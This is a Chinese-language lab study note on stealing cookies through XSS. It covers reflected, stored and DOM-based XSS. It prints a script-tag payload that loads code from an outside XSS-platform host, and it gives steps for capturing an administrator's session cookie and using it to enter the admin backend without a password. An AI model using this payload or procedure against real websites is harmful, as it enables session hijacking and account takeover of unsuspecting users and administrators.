【靶场:9题,第三章:为了更多的权限!留言板!】
一、cookie简介
二、xss获取cookie
三、无密码登录
1、cookie:指某些网站为了辨别用户身份、进行session跟踪而存储在用户本地终端上的数据(通常经过加密)
?? 作用:避免频繁输入账号密码。
?? 使用:我们可以获取他人权限,利用他人什么权限做某些事情。
?? 如何获取cookie:使用xss。? ?
2.1、什么是xss
2.2、xss原理/种类
2.3、通过xss平台拿cookie
(1)xss:夸站脚本攻击,是代码注入的一种,它允恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。
????????? xss是将用户输入的数据当做了 HTML 语句放到了 页面上执行。
????????? 如输入<h1>xss</h1>
(2)xss种类:
??? 1)、反射型:提交的数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,是非持久型攻击【弹框/弹窗,控制录个视频、拍张照片,弹个窗--可以将这个弹窗url/链接发给别人,让他人来点击】。
??? 2)、存储型:提交的数据成功的实现了xss,存入了数据库/文件,别人访问这个页面的时候就会自动触发。【输入的语句被存入到数据库了,且执行了Html语句语法】。
??? 3)、dom型:利用dom树触发xss。【有时也成dom型是一种特殊的反射型】。
(3)随便百度一个xss平台,以尽量小的信息泄露注册【有些符合规则就可以注册】。
???? 创建--》下一步--》勾选 默认模块,选择keepsession--》下一步--》复制<sCRiPt sRC=//xss.pt/Vz8X></sCrIpT>,复制粘贴到有xss漏洞的地方【F12查看页面html代码,复制的该内容灰色/蓝色显示时,表示有xss漏洞,纯黑色显示时,表示后台管理员查看时,会正常显示出来,否则,惊醒后台管理员,是否被黑了】--》获取到管理员cookie后,输入浏览器cookie中,重新访问url链接,则进入到管理员后台。
?【xss平台选择keepsession选项后,平台频繁的会去访问目标网站,保持获取的cookie不失效】
?【如何找xss漏洞---见框就插,尽量使用温和的方式来试,可以输入<h1>您好</h1>】
